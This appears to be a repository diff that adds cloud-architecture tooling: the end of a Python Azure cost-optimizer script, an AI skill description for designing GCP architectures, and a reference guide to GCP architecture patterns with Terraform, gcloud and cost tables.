cost = cluster.get("monthly_cost", 500)
cpu = cluster.get("avg_cpu_utilization", 100)
node_count = cluster.get("node_count", 3)
# Over-provisioned cluster
if cpu < 30 and node_count > 3:
aks_savings = cost * 0.3
savings += aks_savings
self.recommendations.append({
"service": "AKS",
"type": "Right-sizing",
"issue": f"Cluster {cluster.get('name', '?')} has {node_count} nodes at {cpu}% CPU",
"recommendation": "Enable cluster autoscaler. Set min nodes to 2 (or 1 for dev). Use node auto-provisioning.",
"potential_savings_usd": round(aks_savings, 2),
"priority": "high",
})
# Spot node pools for non-critical workloads
if not cluster.get("has_spot_pool", False):
spot_savings = cost * 0.15
savings += spot_savings
self.recommendations.append({
"service": "AKS",
"type": "Spot Node Pools",
"issue": f"Cluster {cluster.get('name', '?')} has no spot node pools",
"recommendation": "Add a spot node pool for batch jobs, CI runners, and dev workloads (up to 90% savings).",
"potential_savings_usd": round(spot_savings, 2),
"priority": "medium",
})
return savings
def _analyze_cosmos_db(self) -> float:
savings = 0.0
dbs = self.resources.get("cosmos_db", [])
for db in dbs:
cost = db.get("monthly_cost", 200)
ru_provisioned = db.get("ru_provisioned", 400)
ru_used = db.get("ru_used_avg", 400)
# Massive over-provisioning
if ru_provisioned > 0 and ru_used / ru_provisioned < 0.2:
cosmos_savings = cost * 0.5
savings += cosmos_savings
self.recommendations.append({
"service": "Cosmos DB",
"type": "Right-sizing",
"issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s ({int(ru_used/ru_provisioned*100)}% utilization)",
"recommendation": "Switch to autoscale throughput or serverless mode. Autoscale adjusts RU/s between 10%-100% of max.",
"potential_savings_usd": round(cosmos_savings, 2),
"priority": "high",
})
elif ru_provisioned > 0 and ru_used / ru_provisioned < 0.5:
cosmos_savings = cost * 0.25
savings += cosmos_savings
self.recommendations.append({
"service": "Cosmos DB",
"type": "Autoscale",
"issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s — variable workload",
"recommendation": "Enable autoscale throughput. Set max RU/s to current provisioned value.",
"potential_savings_usd": round(cosmos_savings, 2),
"priority": "medium",
})
return savings
def _analyze_app_services(self) -> float:
savings = 0.0
apps = self.resources.get("app_services", [])
for app in apps:
cost = app.get("monthly_cost", 100)
cpu = app.get("cpu_utilization", 100)
instances = app.get("instance_count", 1)
tier = app.get("tier", "Basic")
# Over-provisioned instances
if cpu < 20 and instances > 1:
app_savings = cost * 0.4
savings += app_savings
self.recommendations.append({
"service": "App Service",
"type": "Right-sizing",
"issue": f"App {app.get('name', '?')} runs {instances} instances at {cpu}% CPU",
"recommendation": "Reduce instance count or enable autoscale with min=1. Consider downgrading plan tier.",
"potential_savings_usd": round(app_savings, 2),
"priority": "high",
})
# Premium tier for dev/test
if tier in ("PremiumV3", "PremiumV2") and app.get("environment") in ("dev", "test"):
tier_savings = cost * 0.5
savings += tier_savings
self.recommendations.append({
"service": "App Service",
"type": "Plan Tier",
"issue": f"App {app.get('name', '?')} uses {tier} in {app.get('environment', 'unknown')} environment",
"recommendation": "Use Basic (B1) or Free tier for dev/test environments.",
"potential_savings_usd": round(tier_savings, 2),
"priority": "high",
})
return savings
def _analyze_networking(self) -> float:
savings = 0.0
# Unattached public IPs
pips = self.resources.get("public_ips", [])
unattached = [p for p in pips if not p.get("attached", True)]
if unattached:
pip_savings = len(unattached) * 3.65 # ~$0.005/hr = $3.65/month
savings += pip_savings
self.recommendations.append({
"service": "Public IP",
"type": "Unused Resource",
"issue": f"{len(unattached)} unattached public IPs incurring hourly charges",
"recommendation": "Delete unused public IPs. Unattached Standard SKU IPs cost ~$3.65/month each.",
"potential_savings_usd": round(pip_savings, 2),
"priority": "high",
})
# NAT Gateway in dev environments
nat_gateways = self.resources.get("nat_gateways", [])
dev_nats = [n for n in nat_gateways if n.get("environment") in ("dev", "test")]
if dev_nats:
nat_savings = len(dev_nats) * 32 # ~$32/month per NAT Gateway
savings += nat_savings
self.recommendations.append({
"service": "NAT Gateway",
"type": "Environment Optimization",
"issue": f"{len(dev_nats)} NAT Gateways in dev/test environments",
"recommendation": "Remove NAT Gateways in dev/test. Use Azure Firewall or service tags for outbound instead.",
"potential_savings_usd": round(nat_savings, 2),
"priority": "medium",
})
return savings
def _analyze_general(self) -> float:
savings = 0.0
if not self.resources.get("has_budget_alerts", False):
self.recommendations.append({
"service": "Cost Management",
"type": "Budget Alerts",
"issue": "No budget alerts configured",
"recommendation": "Create Azure Budget with alerts at 50%, 80%, and 100% of monthly target.",
"potential_savings_usd": 0,
"priority": "high",
})
if not self.resources.get("has_advisor_enabled", True):
self.recommendations.append({
"service": "Azure Advisor",
"type": "Visibility",
"issue": "Azure Advisor cost recommendations not reviewed",
"recommendation": "Review Azure Advisor cost recommendations weekly. Enable Advisor alerts for new findings.",
"potential_savings_usd": 0,
"priority": "medium",
})
return savings
# ------------------------------------------------------------------
# Helpers
# ------------------------------------------------------------------
def _estimate_current_spend(self) -> float:
total = 0.0
for key in ("virtual_machines", "sql_databases", "aks_clusters", "cosmos_db", "app_services"):
for item in self.resources.get(key, []):
total += item.get("monthly_cost", 0)
# Storage estimate
for acct in self.resources.get("storage_accounts", []):
total += acct.get("size_gb", 0) * 0.018 # Hot tier default
# Public IPs
for pip in self.resources.get("public_ips", []):
total += 3.65
return total if total > 0 else 1000 # Default if no cost data
def _top_priority(self) -> List[Dict[str, Any]]:
high = [r for r in self.recommendations if r["priority"] == "high"]
high.sort(key=lambda x: x.get("potential_savings_usd", 0), reverse=True)
return high[:5]
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def _format_text(report: Dict[str, Any]) -> str:
lines = []
lines.append(f"Current Monthly Spend: ${report['current_monthly_usd']}")
lines.append(f"Potential Savings: ${report['potential_monthly_savings_usd']} ({report['savings_percentage']}%)")
lines.append(f"Optimized Spend: ${report['optimized_monthly_usd']}")
lines.append("")
lines.append("=== Priority Actions ===")
for i, action in enumerate(report.get("priority_actions", []), 1):
lines.append(f" {i}. [{action['service']}] {action['recommendation']}")
lines.append(f" Savings: ${action.get('potential_savings_usd', 0)}")
lines.append("")
lines.append("=== All Recommendations ===")
for rec in report.get("recommendations", []):
lines.append(f" [{rec['priority'].upper()}] {rec['service']}{rec['type']}")
lines.append(f" Issue: {rec['issue']}")
lines.append(f" Action: {rec['recommendation']}")
savings = rec.get("potential_savings_usd", 0)
if savings:
lines.append(f" Savings: ${savings}")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Azure Cost Optimizer — analyze Azure resources and recommend cost savings.",
epilog="Examples:\n"
" python cost_optimizer.py --config resources.json\n"
" python cost_optimizer.py --config resources.json --json",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--config",
required=True,
help="Path to JSON file with current Azure resource inventory",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_output",
help="Output as JSON instead of human-readable text",
)
args = parser.parse_args()
try:
with open(args.config, "r") as f:
resources = json.load(f)
except FileNotFoundError:
print(f"Error: file not found: {args.config}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as exc:
print(f"Error: invalid JSON in {args.config}: {exc}", file=sys.stderr)
sys.exit(1)
optimizer = AzureCostOptimizer(resources)
report = optimizer.analyze()
if args.json_output:
print(json.dumps(report, indent=2))
else:
print(_format_text(report))
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,444 @@
---
name: "gcp-cloud-architect"
description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization."
---
# GCP Cloud Architect
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and GCP experience level
- Compliance requirements (GDPR, HIPAA, SOC 2)
- Availability requirements (SLA, RPO/RTO)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py --input requirements.json
```
**Example output:**
```json
{
"recommended_pattern": "serverless_web",
"service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"],
"estimated_monthly_cost_usd": 30,
"pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"],
"cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"]
}
```
Select from recommended patterns:
- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore
- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub
- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker
- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Estimate Cost
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" },
{ "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" }
],
"total_potential_savings_usd": 745
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Committed use discount opportunities
- Sustained use discount analysis
- Potential monthly savings
Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates.
### Step 4: Generate IaC
Create infrastructure-as-code for the selected pattern:
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Example Terraform HCL output (Cloud Run + Firestore):**
```hcl
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
description = "GCP project ID"
type = string
}
variable "region" {
description = "GCP region"
type = string
default = "us-central1"
}
resource "google_cloud_run_v2_service" "api" {
name = "${var.environment}-${var.app_name}-api"
location = var.region
template {
containers {
image = "gcr.io/${var.project_id}/${var.app_name}:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
env {
name = "FIRESTORE_PROJECT"
value = var.project_id
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
resource "google_firestore_database" "default" {
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
}
```
**Example gcloud CLI deployment:**
```bash
# Deploy Cloud Run service
gcloud run deploy my-app-api \
--image gcr.io/$PROJECT_ID/my-app:latest \
--region us-central1 \
--platform managed \
--allow-unauthenticated \
--memory 512Mi \
--cpu 1 \
--min-instances 0 \
--max-instances 10
# Create Firestore database
gcloud firestore databases create --location=us-central1
```
> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`.
### Step 5: Configure CI/CD
Set up automated deployment with Cloud Build or GitHub Actions:
```yaml
# cloudbuild.yaml
steps:
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.']
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA']
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args:
- 'run'
- 'deploy'
- 'my-app-api'
- '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
- '--region=us-central1'
- '--platform=managed'
images:
- 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
```
```bash
# Connect repo and create trigger
gcloud builds triggers create github \
--repo-name=my-app \
--repo-owner=my-org \
--branch-pattern="^main$" \
--build-config=cloudbuild.yaml
```
### Step 6: Security Review
Verify security configuration:
```bash
# Review IAM bindings
gcloud projects get-iam-policy $PROJECT_ID --format=json
# Check service account permissions
gcloud iam service-accounts list --project=$PROJECT_ID
# Verify VPC Service Controls (if applicable)
gcloud access-context-manager perimeters list --policy=$POLICY_ID
```
**Security checklist:**
- IAM roles follow least privilege (prefer predefined roles over basic roles)
- Service accounts use Workload Identity for GKE
- VPC Service Controls configured for sensitive APIs
- Cloud KMS encryption keys for customer-managed encryption
- Cloud Audit Logs enabled for all admin activity
- Organization policies restrict public access
- Secret Manager used for all credentials
**If deployment fails:**
1. Check the failure reason:
```bash
gcloud run services describe my-app-api --region us-central1
gcloud logging read "resource.type=cloud_run_revision" --limit=20
```
2. Review Cloud Logging for application errors.
3. Fix the configuration or container image.
4. Redeploy:
```bash
gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1
```
**Common failure causes:**
- IAM permission errors -- verify service account roles and `--allow-unauthenticated` flag
- Quota exceeded -- request quota increase via IAM & Admin > Quotas
- Container startup failure -- check container logs and health check configuration
- Region not enabled -- enable the required APIs with `gcloud services enable`
---
## Tools
### architecture_designer.py
Recommends GCP services based on workload requirements.
```bash
python scripts/architecture_designer.py --input requirements.json --output design.json
```
**Input:** JSON with app type, scale, budget, compliance needs
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes GCP resources for cost savings.
```bash
python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000
```
**Output:** Recommendations for:
- Idle resource removal
- Machine type right-sizing
- Committed use discounts
- Storage class transitions
- Network egress optimization
### deployment_manager.py
Generates gcloud CLI deployment scripts and Terraform configurations.
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Output:** Production-ready deployment scripts with:
- Cloud Run or GKE deployment
- Firestore or Cloud SQL setup
- Identity Platform configuration
- IAM roles with least privilege
- Cloud Monitoring and Logging
---
## Quick Start
### Web App on Cloud Run (< $100/month)
```
Ask: "Design a serverless web backend for a mobile app with 1000 users"
Result:
- Cloud Run for API (auto-scaling, no cold start with min instances)
- Firestore for data (pay-per-operation)
- Identity Platform for authentication
- Cloud Storage + Cloud CDN for static assets
- Estimated: $15-40/month
```
### Microservices on GKE ($500-2000/month)
```
Ask: "Design a scalable architecture for a SaaS platform with 50k users"
Result:
- GKE Autopilot for containerized workloads
- Cloud SQL (PostgreSQL) with read replicas
- Memorystore (Redis) for session caching
- Cloud CDN for global delivery
- Cloud Build for CI/CD
- Multi-zone deployment
```
### Serverless Data Pipeline
```
Ask: "Design a real-time analytics pipeline for event data"
Result:
- Pub/Sub for event ingestion
- Dataflow (Apache Beam) for stream processing
- BigQuery for analytics and warehousing
- Looker for dashboards
- Cloud Functions for lightweight transforms
```
### ML Platform
```
Ask: "Design a machine learning platform for model training and serving"
Result:
- Vertex AI for training and prediction
- Cloud Storage for datasets and model artifacts
- BigQuery for feature store
- Cloud Functions for preprocessing triggers
- Cloud Monitoring for model drift detection
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly GCP limit | $500/month max |
| Team context | Size, GCP experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"gcp_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Terraform HCL**: Production-ready Google provider configs
- **gcloud CLI**: Scripted deployment commands
- **Cloud Build YAML**: CI/CD pipeline definitions
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|---|---|---|
| Using default VPC for production | No isolation, shared firewall rules | Create custom VPC with private subnets |
| Over-provisioning GKE node pools | Wasted cost on idle capacity | Use GKE Autopilot or cluster autoscaler |
| Storing secrets in environment variables | Visible in Cloud Console, logs | Use Secret Manager with Workload Identity |
| Ignoring sustained use discounts | Missing 20-30% automatic savings | Right-size VMs for consistent baseline usage |
| Single-region deployment for SaaS | One region outage = full downtime | Multi-region with Cloud Load Balancing |
| BigQuery on-demand for heavy workloads | Unpredictable costs at scale | Use BigQuery slots (flat-rate) for consistent workloads |
| Running Cloud Functions for long tasks | 9-minute timeout, cold starts | Use Cloud Run for tasks > 60 seconds |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering-team/aws-solution-architect` | AWS equivalent — same 6-step workflow, different services |
| `engineering-team/azure-cloud-architect` | Azure equivalent — completes the cloud trifecta |
| `engineering-team/senior-devops` | Broader DevOps scope — pipelines, monitoring, containerization |
| `engineering/terraform-patterns` | IaC implementation — use for Terraform modules targeting GCP |
| `engineering/ci-cd-pipeline-builder` | Pipeline construction — automates Cloud Build and deployment |
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging |
| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery |

View File

@@ -0,0 +1,512 @@
# GCP Architecture Patterns
Reference guide for selecting the right GCP architecture pattern based on application requirements.
---
## Table of Contents
- [Pattern Selection Matrix](#pattern-selection-matrix)
- [Pattern 1: Serverless Web Application](#pattern-1-serverless-web-application)
- [Pattern 2: Microservices on GKE](#pattern-2-microservices-on-gke)
- [Pattern 3: Three-Tier Application](#pattern-3-three-tier-application)
- [Pattern 4: Serverless Data Pipeline](#pattern-4-serverless-data-pipeline)
- [Pattern 5: ML Platform](#pattern-5-ml-platform)
- [Pattern 6: Multi-Region High Availability](#pattern-6-multi-region-high-availability)
---
## Pattern Selection Matrix
| Pattern | Best For | Users | Monthly Cost | Complexity |
|---------|----------|-------|--------------|------------|
| Serverless Web | MVP, SaaS, mobile backend | <50K | $30-400 | Low |
| Microservices on GKE | Complex services, enterprise | 10K-500K | $400-2500 | Medium |
| Three-Tier | Traditional web, e-commerce | 10K-200K | $300-1500 | Medium |
| Data Pipeline | Analytics, ETL, streaming | Any | $100-2000 | Medium-High |
| ML Platform | Training, serving, MLOps | Any | $200-5000 | High |
| Multi-Region HA | Global apps, DR | >100K | 2x single | High |
---
## Pattern 1: Serverless Web Application
### Use Case
SaaS platforms, mobile backends, low-traffic websites, MVPs
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Cloud │ │ Identity │
│ (CDN) │ │ Storage │ │ Platform │
└─────────────┘ │ (Static) │ │ (Auth) │
└─────────────┘ └──────┬──────┘
┌─────────────┐ ┌─────────────┐ ┌──────▼──────┐
│ Cloud DNS │────▶│ Cloud │────▶│ Cloud Run │
│ (DNS) │ │ Load Bal. │ │ (API) │
└─────────────┘ └─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ Firestore │
│ (Database) │
└─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| Frontend | Cloud Storage + Cloud CDN | Static hosting with HTTPS |
| API | Cloud Run | Containerized API with auto-scaling |
| Database | Firestore | Native mode, pay-per-operation |
| Auth | Identity Platform | Multi-provider authentication |
| CI/CD | Cloud Build | Automated container deployments |
### Terraform Example
```hcl
resource "google_cloud_run_v2_service" "api" {
name = "my-app-api"
location = "us-central1"
template {
containers {
image = "gcr.io/my-project/my-app:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
```
### Cost Breakdown (10K users)
| Service | Monthly Cost |
|---------|-------------|
| Cloud Run | $5-25 |
| Firestore | $5-30 |
| Cloud CDN | $5-15 |
| Cloud Storage | $1-5 |
| Identity Platform | $0-10 |
| **Total** | **$16-85** |
### Pros and Cons
**Pros:**
- Scale-to-zero (pay nothing when idle)
- Container-based (no runtime restrictions)
- Built-in HTTPS and custom domains
- Auto-scaling with no configuration
**Cons:**
- Cold starts if min instances = 0
- Firestore query limitations vs SQL
- Vendor lock-in to GCP
---
## Pattern 2: Microservices on GKE
### Use Case
Complex business systems, enterprise applications, platform engineering
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Global │
│ (CDN) │ │ Load Bal. │
└─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ GKE │
│ Autopilot │
└──────┬──────┘
┌──────────────────┼──────────────────┐
│ │ │
┌──────▼──────┐ ┌──────▼──────┐ ┌──────▼──────┐
│ Cloud SQL │ │ Memorystore │ │ Pub/Sub │
│ (Postgres) │ │ (Redis) │ │ (Messaging) │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| CDN | Cloud CDN | Edge caching, HTTPS |
| Load Balancer | Global Application LB | Backend services, health checks |
| Compute | GKE Autopilot | Managed node provisioning |
| Database | Cloud SQL PostgreSQL | Regional HA, read replicas |
| Cache | Memorystore Redis | Session, query caching |
| Messaging | Pub/Sub | Async service communication |
### GKE Autopilot Configuration
```yaml
# Deployment manifest
apiVersion: apps/v1
kind: Deployment
metadata:
name: api-service
spec:
replicas: 2
selector:
matchLabels:
app: api-service
template:
metadata:
labels:
app: api-service
spec:
serviceAccountName: api-workload-sa
containers:
- name: api
image: us-central1-docker.pkg.dev/my-project/my-app/api:latest
ports:
- containerPort: 8080
resources:
requests:
cpu: "500m"
memory: "512Mi"
limits:
cpu: "1000m"
memory: "1Gi"
env:
- name: DB_HOST
valueFrom:
secretKeyRef:
name: db-credentials
key: host
readinessProbe:
httpGet:
path: /health
port: 8080
initialDelaySeconds: 5
periodSeconds: 10
---
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
name: api-service-hpa
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: api-service
minReplicas: 2
maxReplicas: 20
metrics:
- type: Resource
resource:
name: cpu
target:
type: Utilization
averageUtilization: 70
```
### Cost Breakdown (50K users)
| Service | Monthly Cost |
|---------|-------------|
| GKE Autopilot | $150-400 |
| Cloud Load Balancing | $25-50 |
| Cloud SQL | $100-300 |
| Memorystore | $40-80 |
| Pub/Sub | $5-20 |
| **Total** | **$320-850** |
---
## Pattern 3: Three-Tier Application
### Use Case
Traditional web apps, e-commerce, CMS, applications with complex queries
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Global │
│ (CDN) │ │ Load Bal. │
└─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ Cloud Run │
│ (or MIG) │
└──────┬──────┘
┌──────────────────┼──────────────────┐
│ │ │
┌──────▼──────┐ ┌──────▼──────┐ ┌──────▼──────┐
│ Cloud SQL │ │ Memorystore │ │ Cloud │
│ (Database) │ │ (Redis) │ │ Storage │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| CDN | Cloud CDN | Edge caching, compression |
| Load Balancer | External Application LB | SSL termination, health checks |
| Compute | Cloud Run or Managed Instance Group | Auto-scaling containers or VMs |
| Database | Cloud SQL (MySQL/PostgreSQL) | Regional HA, automated backups |
| Cache | Memorystore Redis | Session store, query cache |
| Storage | Cloud Storage | Uploads, static assets, backups |
### Cost Breakdown (50K users)
| Service | Monthly Cost |
|---------|-------------|
| Cloud Run / MIG | $80-200 |
| Cloud Load Balancing | $25-50 |
| Cloud SQL | $100-250 |
| Memorystore | $30-60 |
| Cloud Storage | $10-30 |
| **Total** | **$245-590** |
---
## Pattern 4: Serverless Data Pipeline
### Use Case
Analytics, IoT data ingestion, log processing, real-time streaming, ETL
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Sources │────▶│ Pub/Sub │────▶│ Dataflow │
│ (Apps/IoT) │ │ (Ingest) │ │ (Process) │
└─────────────┘ └─────────────┘ └──────┬──────┘
┌─────────────┐ ┌─────────────┐ ┌──────▼──────┐
│ Looker │◀────│ BigQuery │◀────│ Cloud │
│ (Dashbd) │ │(Warehouse) │ │ Storage │
└─────────────┘ └─────────────┘ │ (Data Lake) │
└─────────────┘
```
### Service Stack
| Layer | Service | Purpose |
|-------|---------|---------|
| Ingestion | Pub/Sub | Real-time event capture |
| Processing | Dataflow (Apache Beam) | Stream/batch transforms |
| Warehouse | BigQuery | SQL analytics at scale |
| Storage | Cloud Storage | Raw data lake |
| Visualization | Looker / Looker Studio | Dashboards and reports |
| Orchestration | Cloud Composer (Airflow) | Pipeline scheduling |
### Dataflow Pipeline Example
```python
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
options = PipelineOptions([
'--runner=DataflowRunner',
'--project=my-project',
'--region=us-central1',
'--temp_location=gs://my-bucket/temp',
'--streaming'
])
with beam.Pipeline(options=options) as p:
(p
| 'ReadPubSub' >> beam.io.ReadFromPubSub(topic='projects/my-project/topics/events')
| 'ParseJSON' >> beam.Map(lambda x: json.loads(x))
| 'WindowInto' >> beam.WindowInto(beam.window.FixedWindows(60))
| 'WriteBQ' >> beam.io.WriteToBigQuery(
'my-project:analytics.events',
schema='event_id:STRING,event_type:STRING,timestamp:TIMESTAMP',
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
))
```
### Cost Breakdown
| Service | Monthly Cost |
|---------|-------------|
| Pub/Sub | $5-30 |
| Dataflow | $30-200 |
| BigQuery (on-demand) | $10-100 |
| Cloud Storage | $5-30 |
| Looker Studio | $0 (free) |
| **Total** | **$50-360** |
---
## Pattern 5: ML Platform
### Use Case
Model training, serving, MLOps, feature engineering
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ BigQuery │────▶│ Vertex AI │────▶│ Vertex AI │
│ (Features) │ │ (Training) │ │ (Endpoints) │
└─────────────┘ └──────┬──────┘ └─────────────┘
┌─────────────┐ ┌──────▼──────┐ ┌─────────────┐
│ Cloud │◀────│ Cloud │────▶│ Vertex AI │
│ Functions │ │ Storage │ │ Pipelines │
│ (Triggers) │ │ (Artifacts) │ │ (MLOps) │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Purpose |
|-------|---------|---------|
| Data | BigQuery | Feature engineering, exploration |
| Training | Vertex AI Training | Custom or AutoML training |
| Serving | Vertex AI Endpoints | Online/batch prediction |
| Storage | Cloud Storage | Datasets, model artifacts |
| Orchestration | Vertex AI Pipelines | ML workflow automation |
| Monitoring | Vertex AI Model Monitoring | Drift and skew detection |
### Vertex AI Training Example
```python
from google.cloud import aiplatform
aiplatform.init(project='my-project', location='us-central1')
job = aiplatform.CustomTrainingJob(
display_name='my-model-training',
script_path='train.py',
container_uri='us-docker.pkg.dev/vertex-ai/training/tf-gpu.2-12:latest',
requirements=['pandas', 'scikit-learn'],
)
model = job.run(
replica_count=1,
machine_type='n1-standard-8',
accelerator_type='NVIDIA_TESLA_T4',
accelerator_count=1,
)
endpoint = model.deploy(
deployed_model_display_name='my-model-v1',
machine_type='n1-standard-4',
min_replica_count=1,
max_replica_count=5,
)
```
### Cost Breakdown
| Service | Monthly Cost |
|---------|-------------|
| Vertex AI Training (T4 GPU) | $50-500 |
| Vertex AI Prediction | $30-200 |
| BigQuery | $10-50 |
| Cloud Storage | $5-30 |
| **Total** | **$95-780** |
---
## Pattern 6: Multi-Region High Availability
### Use Case
Global applications, disaster recovery, data sovereignty compliance
### Architecture Diagram
```
┌─────────────┐
│ Cloud DNS │
│(Geo routing)│
└──────┬──────┘
┌────────────────┼────────────────┐
│ │
┌──────▼──────┐ ┌──────▼──────┐
│us-central1 │ │europe-west1 │
│ Cloud Run │ │ Cloud Run │
└──────┬──────┘ └──────┬──────┘
│ │
┌──────▼──────┐ ┌──────▼──────┐
│Cloud Spanner│◀── Replication ──▶│Cloud Spanner│
│ (Region) │ │ (Region) │
└─────────────┘ └─────────────┘
```
### Service Stack
| Component | Service | Configuration |
|-----------|---------|---------------|
| DNS | Cloud DNS | Geolocation or latency routing |
| CDN | Cloud CDN | Multiple regional origins |
| Compute | Cloud Run (multi-region) | Deployed in each region |
| Database | Cloud Spanner (multi-region) | Strong global consistency |
| Storage | Cloud Storage (multi-region) | Automatic geo-redundancy |
### Cloud DNS Geolocation Policy
```bash
# Create geolocation routing policy
gcloud dns record-sets create api.example.com \
--zone=my-zone \
--type=A \
--routing-policy-type=GEO \
--routing-policy-data="us-central1=projects/my-project/regions/us-central1/addresses/api-us;europe-west1=projects/my-project/regions/europe-west1/addresses/api-eu"
```
### Cost Considerations
| Factor | Impact |
|--------|--------|
| Compute | 2x (each region) |
| Cloud Spanner | Multi-region 3x regional price |
| Data Transfer | Cross-region replication costs |
| Cloud DNS | Geolocation queries premium |
| **Total** | **2-3x single region** |
---
## Pattern Comparison Summary
### Latency
| Pattern | Typical Latency |
|---------|-----------------|
| Serverless Web | 30-150ms (Cloud Run) |
| GKE Microservices | 15-80ms |
| Three-Tier | 20-100ms |
| Multi-Region | <50ms (regional) |
### Scaling Characteristics
| Pattern | Scale Limit | Scale Speed |
|---------|-------------|-------------|
| Serverless Web | 1000 instances/service | Seconds |
| GKE Microservices | Cluster node limits | Minutes |
